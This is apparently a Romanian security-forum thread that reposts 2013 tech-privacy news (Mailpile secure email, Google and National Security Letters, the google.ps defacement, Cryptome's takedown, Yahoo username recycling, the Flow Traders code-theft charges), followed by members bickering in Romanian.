With the specter of government surveillance hanging over this post-PRISM world, people are beginning to wonder if the idea of secure email is complete nonsense. Ever since the former National Security Agency contractor Edward Snowden leaked documents revealing the extent of the spy agency’s monitoring activities, many are convinced that email can never be completely safe from prying eyes, and some have even given it up entirely. In recent weeks, two services that promised to offer completely secure email — Lavabit and Silent Circle — have shutdown, apparently because they couldn’t stop the government from breaking their security. But the reality is that email is an integral part of both our personal and professional lives — something that most of us can’t give up without alienating friends and family and ditching our day jobs. We have no choice but to find new ways making it safe. “E-mail is going to be with us for a long time,” says Bjarni Rúnar Einarsson, a software developer and member of the Icelandic Pirate Party. “We need to do what we can to make it more secure.” Einarsson is doing his part with Mailpile, an open source web-based e-mail client that you can run on your own computer or in the cloud. With this creation, he hopes to make it easier for every day users to encrypt their mail — without giving up the sort of search tools they get from a service like Google’s Gmail. The team has already raised over $100,000 dollars on the crowdfunding site Indie GoGo to fund its future development. It’s a tough time to pitch secure email. But that’s what Einarsson is doing. And it only makes sense. Despite the fallout from Snowden’s leaks, privacy experts realize that most of us can’t help but use email and that our only choice is to secure it as best we can. “Those of us that are going to stay online need to determine the tools that are best for us,” says Rainey Reitman, the director of the activism team at the Electronic Frontier Foundation. The government may have the technical means to reach public email services and, with National Security Letters, it may have other ways of getting at our messages, but we can minimize these threats — and that’s what Mailpile aims to do. Einarsson, an ex-Googler, points out that one of the biggest problems with e-mail is that large providers like Gmail make tempting targets for both malicious hackers and overzealous governments. A government service or a hacker with “direct access” to Google could tap thousands, perhaps millions, of e-mail boxes. But if no single e-mail provider had such a large user base, government and attackers would have a much harder time. “It’s more expensive to subpoena hundreds or thousands of [e-mail providers] all over the world than it is to subpoena one big target like Gmail,” Einarsson says. Yes, you can already sign-up for an e-mail account with an alternative hosting provider and move your email into a client like Thunderbird. But Gmail has changed people’s expectations about how e-mail should work, particularly with regard to search. If you decide to switch from Gmail to another provider, you may find the tools sorely lacking. That’s what happened to Einarsson a few years ago. “I’d become addicted to being able to search and process large volumes of e-mail quickly,” he says. “When I started to become uncomfortable with using a proprietary solution living in the cloud I began to look for alternatives and couldn’t find anything. I had a realization of how I could design something that would function like Gmail on my own computer at home, so I wrote the code and it worked.” Eventually, he reached out to fellow Icelandic developer and activist Smári McCarthy and the two started to build a more fully realized application. But while they’d solved the search issue, they knew that if they wanted people to actually use the product it would have to be as easy to use and as attractive as Gmail. So, in May, they showed their prototype to Brennan Novak, a Portland, Oregon based user interface designer. Novak’s biggest task is to make the application’s security and privacy tools more easily accessible to average users. Most major e-mail clients have plugins that add support for encryption — Mailvelope for Gmail, Enigmail for Thunderbird or GPGTools for Apple Mail, for example. But PGP encryption remains notoriously cumbersome to use. “Because those things are plugins they don’t have access to your entire client,” Novak says. “For example, the one for Apple Mail is really good, but it doesn’t have access to the address book.” He believes that tighter integration from the very beginning will make the difference. Even if Novak doesn’t get the interface right, Mailpile is providing an open source platform that other designers can easily modify. Because it’s built on web technologies, such as HTML, CSS and JavaScript, web designers will have an easier time contributing alternative user interfaces and templates. He says that’s actually one of the biggest advantages to Mailpile: it will give people the chance to experiment with the platform in ways that you could never tinker with Gmail. “We need a free software project where people can innovate on these things and add features,” says Einarsson. “When you’re working with a proprietary system in the cloud you have limited options.” Novak points out that even if they can make PGP easy to use, they’ll still need to encourage adoption by other users. You can have the most secure e-mail client and e-mail server in the world, but if the person you’re sending messages to doesn’t follow good security practices, you’re wasting your time. The key, Novak says, will be in getting people who already have encryption keys to get other people to sign-up as well. “My goal is to make it like sending a friend request on a social network,” he says. Mailpile’s encryption tools could indeed make e-mail more secure, but there are still risks. Even those using PGP to encrypt messages will leave behind information such as who they exchanged messages with, even if the contents of those messages have been read. It’s like having a log of your phone conversations: Someone can tell who you talked to and when, but they don’t know what you actually said. “If you’re actually concerned that someone will know who you’re communicating with, that’s not something that PGP can help,” Reitman says. She says secure real-time chat tools — like the Off-the-Record plugin for the Pidgeon and Adium instant message clients, or an anonymous file uploading system like the New Yorker’s open source project DeadDrop — might be better under some circumstances. But for those stuck in the world of e-mail, a tool like Mailpile offers some hope. It won’t stop a National Security Letter, but it’s something. Source Wired.Com

A recent court filing by the Justice Department redacts Google's name in all instances but one, finally making official what had been an open secret. Google's name might be household fare for the rest of us, but in at least one national security court case, it is still subject to redaction -- as long as the government remembers to obfuscate all instances of the company's name. The Wall Street Journal reported that a Department of Justice court filing on August 23 in the US District Court for the Southern District of New York didn't redact Google's name in one instance from the document [PDF], finally confirming what many had suspected: that Google was the unnamed company fighting the government's use of National Security Letters to gain access to company-owned data. Google is one of the few companies thought to have contested such requests. Electronic Frontier Foundation attorney Matt Zimmerman told Bloomberg in April that the US government has issued more than 300,000 such letters since 2000, which have been contested only by four or five recipients. The letters routinely come with a gag order that prevents the recipient from discussing the case in public. Google recently challenged those gag orders, making it the first company to do so, but the company was ordered to comply with the FBI's secret NSL demands. Source News.Cnet.Com

Few minutes ago, the google Palestine website(google.ps) is hacked and defaced by a group of hackers. "uncle google we say hi from Palestine to remember you that the country in Google map not called Israel. Its called Palestine" The hacker wrote in the defacement. "#Question : What would happens if we changed the country title of Israel to Palestine in Google Maps..!" The defacement message reads. "It would be revolution. So Listen rihanna and be cool". The website is restored within few minutes. However, we are able to take the screenshot of the Defacement. Update: "Some users visiting google.ps have been getting redirected to a different website; Google services for the google.ps domain were not hacked. We’re in contact with the organization responsible for managing this domain name so we can help resolve the problem" Google spokesperson said in a statement sent to Washington Post. - Source EHackingNews.COm

O noua melodie de la EMINEM - care va face parte din noul album MMLP2 - Marshal Matters LP 2 - Lansare Noiembrie 2013 :

Longstanding whistleblower site Cryptome.org is back online after a brief takedown, sparked by its hosting of a list of alleged Japanese terrorists. The takedown by host Network Solutions came as a result of a complaint signed Sima Jiro, who complained that the 114 documents in a file identified as jp-terrorist-files.zip contained “lots of personal information, such as named, DOBs, family structures, workplaces, phone numbers. And also containing lots of documents which are probably classified or confidential”. The complainant also hoped not to be identified to Cryptome: “I sincerely ask you to refrain from sending my request forward to your customer or administrator of “Cryptome” or the uploader of the ZIP file.” Network Solutions initially complied with the request. However – presumably following some discussion between John Young and Network Solutions – it has now been restored. Young is no stranger to takedowns. His site, an anonymous drop-box for whistleblowers which documents both corporate and government shenanigans, has been variously attacked with notices from Microsoft (taken down and then restored), Yahoo! (taken down and restored), and PayPal (banned then unbanned). In 2010, Young famously described Wikileaks' Julian Assange as a “narcissistic individual” who is willing to “sacrifice Bradley Manning* and anyone else to advance their own interests” (*now Chelsea Manning). The correspondence over the latest takedown is here. ® Source TheRegister.co.uk

Yahoo! has begun to recycle old usernames from inactive accounts and is starting a three-year paid service so that users can put dibs on the ones that they want. In July, Yahoo! said it planned to allow people to change their usernames for something a little more personal and asked for volunteers to sign up for the program. It has now begun replying to those who signed up before August 7 to let them know their new online identities. Those that missed the free offer can pay a one-off fee of $1.99 to register the top five usernames they would like to have on a new watch list. If one of the names is freed up, it will be reassigned and the lucky recipient will have 14 days to either change persona or run multiple Yahoo! accounts, but there's no guarantee that anyone's top five will become available. In the beta program, Yahoo! reported that David, Michael, and Alex were the most requested male names, with Maria, Jennifer, and, Jessica the top picks for women. Dylan Casey, senior director of platforms at Yahoo!, also reported Superman and Batman scored very highly in people's wishlists. When Yahoo! announced the service, some in the industry worried that it might be a boon to identity thieves, or that mail intended for the original username-creator would start appearing in the inbox of its new owner. To beat that, Yahoo! has created a "Require-Recipient-Valid-Since" system and submitted it to the Internet Engineering Task Force. In an explanatory blog post, Yahoo! said that if, for example, a new username recipient tries to check into their Facebook account, the social networking would ping back an email to Yahoo! containing the Require-Recipient-Valid-Since header, which checks Yahoo!'s servers to see when the last activity on that account was, and rejects the request if necessary. Yahoo! is hoping that will be enough to see off most problems. Presumably charging $2 for a choice of five names will also discourage people trying to scam the system. ® Source TheRegister.co.uk

Three men have been charged with pilfering trade secrets from a Wall Street firm after two of them emailed themselves computer code belonging to their former employer from their company email accounts. Glen Cressman and Jason Vuu, both former employees of Wall Street firm Flow Traders, were each charged with unlawful duplication of computer related material and unauthorized use of secret scientific material after making off with sensitive documents, the Wall Street Journal reports. The 26-year-old Vuu was charged with 20 counts of each offense, having emailed himself various materials related to Flow Traders' trading strategies and valuation algorithms over the period from August 2011 to August 2012. According to Bloomberg, Vuu was aware that he was doing something illicit, because he would sometimes change the file formats of email attachments in an attempt to conceal what it was that he was sending himself. Vuu, who currently lives in California, allegedly shared the purloined code with a college friend, one Simon Lu of Pittsburgh, Pennsylvania, with the aim of starting a new trading company together. Lu has been charged with three counts each of the same offenses as Vuu. But although Vuu's lawyer, Jeremy Saland, admits that Vuu did email himself sensitive code without authorization, he maintains that no real damage was done. "I'm confident that when the DA's office has completed their investigation they will find Flow Traders did not suffer any economic loss," Saland told Bloomberg. "Their algorithms and code weren't taken or used in any malicious way that damaged or compromised their financial security." Meanwhile, Cressman has been charged with two counts each of the same offenses as Vuu, although unlike Vuu, the complaint does not allege that he did so as part of a plan to start up his own firm. "Glen Cressman is innocent," the 26-year-old's attorney told Bloomberg. "He was a great employee for Flow Traders. I am confident that when everything is put on the table, the case against him will completely unravel." If convicted of these fairly minor offenses, each of the three men could face a maximum of four years in prison, but experts say it is likely that they wouldn't have to serve any prison time at all. The men are next due in court on November 18, when prosecutors will seek a grand jury indictment that would see the case proceed to trial. ® Source TheRegister.co.uk

Deja imi este frica de amenintarea asta.Gaseste-ti alt partener de joaca .. eu sunt prea bun pentru tine.

Am inteles, nu se poate.

O idee pe care am sustinut-o.

Atunci de ce mai exista sectiunea "Stiri securitate" ? Eu am observat in saptamana in care nu am postat mai nimic ca se face acelasi lucru doar ca de alti useri printre care si Nytro. Pentru ei de ce nu se face topic special ? Chiar asa antipatic va sunt? Pai o sa cam aveti de munca sincer. // Si acum hai sa facem spam, ca asta stim cel mai bine, nu Kabron?

Nu iti place nu intra.Simplu.Aia 20-30 care intra si citesc sunt de ajuns. Oh, imi pare rau de tine Kabron postezi atat de multe tutoriale si lucruri utile pe forum incat nu se vad de stirile mele intr-adevar..

Nu este problema mea ca nu iti place tie sa citesti Kabron. Wildchild : E frumos sa vorbim fara sa ne cunoastem. // Daca aveti ceva de comentat adresati-va administratorului Nytro.Sa facem topicuri despre altii stim cu totii "Kabron". Du-te si ai grija de chat ca n-ai treaba pe forum.

Nu gasesc nicio motivatie logica in cererea ta.Counter Strike 1.6 nu se mai joaca nimeni, decat copii de sub 14 ani care intra codati injura si se cred zmeii jocurilor din lume. Ai nevoie pentru ca ai luat ban pe VAC pentru coduri si speri sa iti dea cineva moca aici.